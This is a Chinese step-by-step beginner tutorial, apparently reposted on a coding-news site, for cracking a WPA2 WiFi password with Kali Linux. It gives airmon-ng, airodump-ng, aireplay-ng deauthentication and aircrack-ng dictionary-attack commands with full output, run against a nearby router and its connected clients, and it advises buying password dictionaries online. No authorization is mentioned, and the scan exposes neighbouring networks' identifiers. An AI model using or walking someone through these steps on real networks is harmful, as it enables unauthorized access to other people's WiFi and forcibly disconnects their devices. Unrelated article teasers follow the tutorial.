小白教程--- kali(po解)WIFI密码 (图文教程)

kali学得好,牢饭少不了!!!

原理:

模拟WiFi的已连接设备,强制让其下线重连,获取其握手包,使用密码字典(宝丽)婆洁。

环境(准备工作):

无线网卡:RT3070L

第一行信息

┌──(root㉿kali)-[/home/kali]
└─# lsusb                             
Bus 002 Device 018: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

linux系统

┌──(root㉿kali)-[/home/kali]
└─# head -n 1 /etc/issue
Kali GNU/Linux Rolling \n \l┌──(root㉿kali)-[/home/kali]
└─# uname -a
Linux kali 6.5.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09) x86_64 GNU/Linux┌──(root㉿kali)-[/home/kali]
└─# uname -r
6.5.0-kali3-amd64

操作步骤:

步骤1:网卡连接虚拟机系统

网卡连接前 lsusb 查看连接信息

┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

插上网卡后再次查看信息,确保网卡以连上

第一行就是连上的网卡

┌──(root㉿kali)-[/home/kali]
└─# lsusb
Bus 002 Device 019: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 0e0f:0006 VMware, Inc. Virtual Keyboard
Bus 001 Device 003: ID 0e0f:0002 VMware, Inc. Virtual USB Hub
Bus 001 Device 002: ID 0e0f:0003 VMware, Inc. Virtual Mouse
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

步骤2:查看网卡是否识别 

ifconfig -a

 如果出现 wlan0 则说明网卡已连接成功

┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500ether 00:0c:29:b2:db:62  txqueuelen 1000  (Ethernet)RX packets 15228  bytes 22181855 (21.1 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1395  bytes 97861 (95.5 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 884  bytes 44240 (43.2 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 884  bytes 44240 (43.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0wlan0: flags=4098<BROADCAST,MULTICAST>  mtu 1500ether 14:6b:9c:02:72:1a  txqueuelen 1000  (Ethernet)RX packets 0  bytes 0 (0.0 B)RX errors 0  dropped 0  overruns 0  frame 0TX packets 0  bytes 0 (0.0 B)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

步骤3:开启网卡监控

airmon-ng start wlan0
┌──(root㉿kali)-[/home/kali]
└─# airmon-ng start wlan0PHY     Interface       Driver          Chipsetphy14   wlan0           rt2800usb       Ralink Technology, Corp. RT2870/RT3070(mac80211 monitor mode vif enabled for [phy14]wlan0 on [phy14]wlan0mon)(mac80211 station mode vif disabled for [phy14]wlan0)

查看是否监控成功

ifconfig -a

如果出现wlan0mon则说明监控成功

┌──(root㉿kali)-[/home/kali]
└─# ifconfig -a
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500ether 00:0c:29:b2:db:62  txqueuelen 1000  (Ethernet)RX packets 15228  bytes 22181855 (21.1 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1395  bytes 97861 (95.5 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 884  bytes 44240 (43.2 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 884  bytes 44240 (43.2 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500unspec 14-6B-9C-02-72-1A-00-62-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)RX packets 3281  bytes 559070 (545.9 KiB)RX errors 0  dropped 3281  overruns 0  frame 0TX packets 0  bytes 0 (0.0 B)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

步骤4:扫描附近WiFi

airodump-ng wlan0mon

扫描结果如下 ,确定需要破解的WiFi

本文以TP-LINK_97A4为例

 CH  4 ][ Elapsed: 1 min ][ 2024-06-08 01:49                                                                                                               BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                           10:63:4B:30:FD:67  -33       30        0    0  12  270   WPA2 CCMP   PSK  MERCURY_FD67                                                                    16:D8:64:51:4F:EE  -65       10        0    0   6  270   WPA2 CCMP   PSK  <length:  0>                                                                    F4:2A:7D:38:D5:15  -66        2        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_D502                                                                    14:D8:64:50:4F:EE  -66       17        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_4FEE                                                                    C8:75:F4:69:54:92  -56       26        0    0   6  324   WPA2 CCMP   PSK  CMCC-3u4g                                                                       24:69:68:76:97:A4  -37       38       22    0   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                    C0:A4:76:6A:05:EB  -55       23        0    0  11  360   WPA2 CCMP   PSK  CMCC-gURM                                                                       70:AF:6A:8C:45:08  -65        3        2    0  11  130   WPA2 CCMP   PSK  306                                                                             D4:84:09:38:2C:A2  -64       21        1    0  11  270   WPA2 CCMP   PSK  MERCURY_2CA2                                                                    24:CF:24:CD:E9:27  -59       20        0    0  10  130   WPA2 CCMP   PSK  cpdd                                                                            80:8B:1F:98:B2:60  -50       10        0    0   5  270   WPA2 CCMP   PSK  504                                                                             A4:A9:30:FA:FB:E5  -57       31       10    0   4  130   WPA2 CCMP   PSK  Xiaomi_FBE4                                                                     E0:EF:02:01:67:BD  -46       33        6    0   1  360   WPA2 CCMP   PSK  403*                                                                            80:6B:1F:00:26:23  -66       25        2    0   1  130   WPA2 CCMP   PSK  XJT-400M_2622                                                                   C8:BF:4C:95:CB:CF  -59       35        0    0   1  270   WPA2 CCMP   PSK  Xiaomi_43EF                                                                     BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         24:69:68:76:97:A4  F2:E6:18:8D:02:54  -40    0 - 6      0        1                                                                                        24:69:68:76:97:A4  14:13:33:6C:12:9D  -44    0 - 1      0        3         TP-LINK_97A4                                                                   24:69:68:76:97:A4  76:82:DA:61:E7:B9  -54    1e- 1e     0       31                                                                                        80:8B:1F:98:B2:60  4A:A5:AA:BB:42:DD  -62    0 - 1e     0        6                                                                                        A4:A9:30:FA:FB:E5  C2:58:EB:56:AA:4A  -58    0 -24      0        2                                                                                        E0:EF:02:01:67:BD  F4:D6:20:92:04:42  -44    2e- 1e     0        7                                                                                        80:6B:1F:00:26:23  5C:D0:6E:DF:49:3A  -58    0 - 1e     0        4  

步骤5:命令行等待抓取握手包

airodump-ng -w ./GGX -c 6 --bssid 24:69:68:76:97:A4 wlan0mon -ignore-nefative-oneaa

c:指定信道,即步骤4扫描结果CH列内容

-w:指定抓去握手包的存放路径

–bssid:指定路由器的MAC,即步骤4扫描结果的第一列BSSID

需要更改两个参数,信道和地址,这两个参数分别是扫描wifi时确定要破解的wifi参数

抓取扫描结果,如下,当前WiFi有4台设备连接

 CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 36 s ][ 2024-06-08 01:57                                                                           BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                       24:69:68:76:97:A4  -37 100      377       51    0   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         24:69:68:76:97:A4  14:13:33:6C:12:9D  -34    0 - 1e     0       15         TP-LINK_97A4                                                                   24:69:68:76:97:A4  14:D1:69:11:A5:6C  -46    1e- 6      0       32                                                                                        24:69:68:76:97:A4  F2:E6:18:8D:02:54  -44    1e- 6      0       88                                                                                        24:69:68:76:97:A4  76:82:DA:61:E7:B9  -48    1e- 1e     1       73    

步骤6:抓取握手包

步骤5都界面不需要关闭,模拟期中一台设备,让其断线重连,抓取其握手包。

aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon

-0:代表攻击次数,以5次为例

-a:指定路由器的MAC

-c:指定客户机的MAC

└─# aireplay-ng -0 5 -a 24:69:68:76:97:A4 -c 14:13:33:6C:12:9D wlan0mon
02:05:49  Waiting for beacon frame (BSSID: 24:69:68:76:97:A4) on channel 6
02:05:51  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [80|64 ACKs]
02:05:52  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [68|53 ACKs]
02:05:53  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [86|62 ACKs]
02:05:54  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [65|49 ACKs]
02:05:55  Sending 64 directed DeAuth (code 7). STMAC: [14:13:33:6C:12:9D] [67|39 ACKs]

步骤7:抓取握手包结果

回到步骤5打开的终端,如果出现handshake,则说明握手包抓取成功,

如果抓取失败,则模拟另外一台设备,重复步骤6

CH  6 ][ GPS  *** No Fix! ***              ][ Elapsed: 3 mins ][ 2024-06-08 02:08 ][ WPA handshake: 24:69:68:76:97:A4                                     BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                       24:69:68:76:97:A4  -42  96     1745     1577    2   6  405   WPA2 CCMP   PSK  TP-LINK_97A4                                                                BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                         24:69:68:76:97:A4  B0:D5:9D:6E:BF:48    1    1e- 1e     0       17                                                                                        24:69:68:76:97:A4  14:D1:69:11:A5:6C  -52    0 - 6      0        8                                                                                        24:69:68:76:97:A4  F2:E6:18:8D:02:54  -42    1e- 6      0       42                                                                                        24:69:68:76:97:A4  14:13:33:6C:12:9D  -28   11e- 5e    11     1437  EAPOL  TP-LINK_97A4                                                                   24:69:68:76:97:A4  76:82:DA:61:E7:B9  -52    1e-11e    18      833     

观察目录下是否生成文件

┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root         28 Jun  8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root         28 Jun  8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root       5572 Jun  8 02:06 GGX-03.ivs

步骤8:获取密码字典

此步骤非常重要,能否(婆洁)成功就看它了

可以通过某宝获取,或者是网络上搜索

一般购买无线网卡会赠送字典

步骤9:将密码字典拷贝至于握手包文件同一个路径

┌──(root㉿kali)-[/home/kali]
└─# ls -l
total 1519876
-rw-r--r-- 1 root root         28 Jun  8 01:57 GGX-01.ivs
-rw-r--r-- 1 root root         28 Jun  8 01:59 GGX-02.ivs
-rw-r--r-- 1 root root       5572 Jun  8 02:06 GGX-03.ivs
-rw------- 1 kali kali      16391 Jun  2 10:46 wordlist.TXT

步骤10:保利婆洁WiFi密码

aircrack-ng -w wordlist.TXT GGX-0*

wordlist.TXT 是字典

婆洁成功界面,密码越简单越容易被婆洁

KEY FOUND!后面的就是密码

                               Aircrack-ng 1.7 [00:00:02] 2039/2109 keys tested (1269.26 k/s) Time left: 0 seconds                                      96.68%KEY FOUND! [ 123456 ]Master Key     : 97 77 C9 45 72 B4 90 9C 56 F7 22 AD F1 E0 8A DC E9 3F 7F 1D A1 D6 AE 79 89 D5 8A FE E1 95 FE 59 Transient Key  : 57 E3 41 E7 5A A3 C3 B2 30 09 17 7D 53 B1 60 BC 05 17 02 B5 3C 78 10 5E 79 3C 81 8D A2 5B 94 C4 08 1C DC EC 31 A2 32 6E 96 D9 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EAPOL HMAC     : 1C 9E F6 0D 9D 16 92 37 0D 90 6E 9B D9 03 7F B8 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/345033.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

跨域、JSONP、CORS、Spring、Spring Security解决方案

概述 JavaScript出于安全方面的考虑&#xff0c;不允许跨域调用其他页面的对象。跨域是浏览器&#xff08;如Chrome浏览器基于JS V8引擎&#xff0c;可以简单理解为JS解释器&#xff09;的一种同源安全策略&#xff0c;是浏览器单方面限制脚本的跨域访问。因此&#xff0c;仅有…

【Java面试】十六、并发篇:线程基础

文章目录 1、进程和线程的区别2、并行和并发的区别3、创建线程的四种方式3.1 Runnable和Callable创建线程的区别3.2 线程的run和start 4、线程的所有状态与生命周期5、新建T1、T2、T3&#xff0c;如何保证线程的执行顺序6、notify和notifyAll方法有什么区别7、wait方法和sleep方…

Flutter Image源码分析

本文用于记录分析Imge图片加载流程源码分析学习笔记 切入点是Image.network,加载网络图片 构造方法会创建NetworkImage,加载图片的实现类,父类是ImageProvider 加载本地图片等等都是类似 下面进入_ImageState类 void resolveStreamForKey(ImageConfiguration configurat…

【云原生】基于windows环境搭建Docker

目录 一、Docker Desktop搭建 二、前置准备 2.1开启 Hyper-V 2.2 Hyper-V选项看不到问题解决 2.3 开启或升级wsl 三、安装过程 3.1 下载安装包 3.2 安装 Docker Desktop 3.2.1 Docker 图标一直处于starting状态问题解决 3.3 配置仓库与镜像 3.4 docker功能测试 四、…

C++中的一些困惑(长期更新中)

C中的一些困惑 文章目录 C中的一些困惑1. using std::具体命名与using namespace std;2. 【int \*p[10] 】与 【int (\*p)[10]】3. main()函数可带参&#xff0c;参从何来&#xff1f;4. constexpr函数的返回值可不为常量&#xff0c;那这时constexpr关键字作用是什么&#xff…

CTF Show MISC做题笔记

MISCX 30 题目压缩包为misc2.rar,其中包含三个文件:misc1.zip, flag.txt, hint.txt。其中后两个文件是加密的。 先解压出misc1.zip, 发现其中包含两个文件&#xff1a;misc.png和music.doc。其中后面文件是加密的。 解压出misc.png,发现图片尾部有消息&#xff1a;flag{flag…

一个简单的消息队列

目录 原理 实现代码 示例 原理 消息队列是一个先进先出栈&#xff0c;每次都处理第一项&#xff0c;处理完了过后会删除这个消息&#xff0c;这是一个简单的消息队列图&#xff1a; 实现代码 首先消息队列需要一个队列&#xff0c;我们用Python里的列表&#xff1a; self.…

Shell脚本学习_内置命令

目录 1.内置命令介绍&#xff1a; 2.Shell内置命令&#xff1a;alias设置别名 3.Shell内置命令&#xff1a;echo输出字符串 4.Shell内置命令&#xff1a;read读取控制台输入 5.Shell内置命令&#xff1a;exit退出 6.Shell内置命令&#xff1a;declare设置变量 1.内置命令…

【计算机毕业设计】283基于微信小程序校园订餐

&#x1f64a;作者简介&#xff1a;拥有多年开发工作经验&#xff0c;分享技术代码帮助学生学习&#xff0c;独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。&#x1f339;赠送计算机毕业设计600个选题excel文件&#xff0c;帮助大学选题。赠送开题报告模板&#xff…

用python编撰一个电脑清理程序

自制一个电脑清理程序&#xff0c;有啥用呢&#xff1f;在电脑不装有清理软件的时候&#xff0c;可以解决自己电脑内存不足的情况。 1、设想需要删除指定文件夹中的临时文件和缓存文件。以下是代码。 import os import shutil def clean_folder(folder_path): for root,…

【备战蓝桥杯】蓝桥杯省一笔记:算法模板笔记(Java)

蓝桥杯 0、快读快写模板1、回文判定2、前缀和3、差分4、二分查找5、快速幂6、判断素数7、gcd&lcm8、进制转换9、位运算10、字符串常用API11、n的所有质因子12、n的质因子个数13、n的约数个数14、n阶乘的约数个数15、n的约数和16、阶乘 & 双阶乘17、自定义升序降序18、动…

Java----抽象类和接口

欢迎大家来这次博客-----抽象类和接口。 1.抽象类 1.1 抽象类概念 在Java中我们都是通过类来描述对象&#xff0c;但反过来并不是所有的类都是用来描述对象的。当一个类中没有足够的信息来描述一个具体对象&#xff0c;我们就将该类称为抽象类。 如上图中的Shape类&#xff…

Wireshark自定义Lua插件

背景&#xff1a; 常见的抓包工具有tcpdump和wireshark&#xff0c;二者可基于网卡进行抓包&#xff1a;tcpdump用于Linux环境抓包&#xff0c;而wireshark用于windows环境。抓包后需借助包分析工具对数据进行解析&#xff0c;将不可读的二进制数转换为可读的数据结构。 wires…

SwiftUI五视图动画和转场

代码下载 使用SwiftUI可以把视图状态的改变转成动画过程&#xff0c;SwiftUI会处理所有复杂的动画细节。在这篇中&#xff0c;会给跟踪用户徒步的图表视图添加动画&#xff0c;使用animation(_:)修改器给一个视图添加动画效果非常容易。 下载起步项目并跟着本篇教程一步步实践…

单元测试覆盖率

什么是单元测试覆盖率 关于其定义&#xff0c;先来看一下维基百科上的一段描述&#xff1a; 代码覆盖&#xff08;Code coverage&#xff09;是软件测试中的一种度量&#xff0c;描述程序中源代码被测试的比例和程度&#xff0c;所得比例称为代码覆盖率。 简单来理解&#xff…

【Redis学习笔记05】Jedis客户端(中)

Jedis客户端 1. 命令 1.1 String类型 1.1.1 常见命令 SET命令 语法&#xff1a;SET key value [EX seconds | PX milliseconds] [NX|XX] 说明&#xff1a;将string类型的value值设置到指定key中&#xff0c;如果之前该key存在&#xff0c;则会覆盖原先的值&#xff0c;原先…

短剧看剧系统投流版系统搭建,前端uni-app

目录 前言&#xff1a; 一、短剧看剧系统常规款短剧系统和投流版的区别&#xff1f; 二、后端体系 1.管理端&#xff1a; 2.代理投流端 三、功能区别 总结&#xff1a; 前言&#xff1a; 23年上半年共上新微短剧481部&#xff0c;相较于2022年全年上新的454部&#xff0…

C语言王国——数据的内存管理

目录 一、引言 二、整形在内存中的存储 2.1 进制之间的转换 2.1.1 整形的二进制 2.1.2 十进制和二进制 2.1.3 十进制和八进制的转换 2.1.4 十六进制和十进制的转换 2.2 原码&#xff0c;反码&#xff0c;和补码 三、大、小端字节序 3.1 大小端的定义 3.2 为什么会有大…

高考后志愿填报信息采集系统制作指南

在高考的硝烟散去之后&#xff0c;每位学生都面临着一个重要的任务——志愿填报。老师们如何高效、准确地收集和整理这些信息&#xff0c;成为了一个棘手的问题。难道我们只能依赖传统的手工登记方式&#xff0c;忍受其繁琐和易错吗&#xff1f; 易查分是一个简单易用的在线工具…

容器中运行ping提示bash: ping: command not found【笔记】

容器中运行ping提示bash: ping: command not found 原因是容器中没有安装ping命令 在容器中安装ping命令&#xff0c;可以使用以下命令&#xff1a; 对于基于Debian/Ubuntu的容器&#xff0c;使用以下命令&#xff1a; apt-get update apt-get install -y iputils-ping对于基…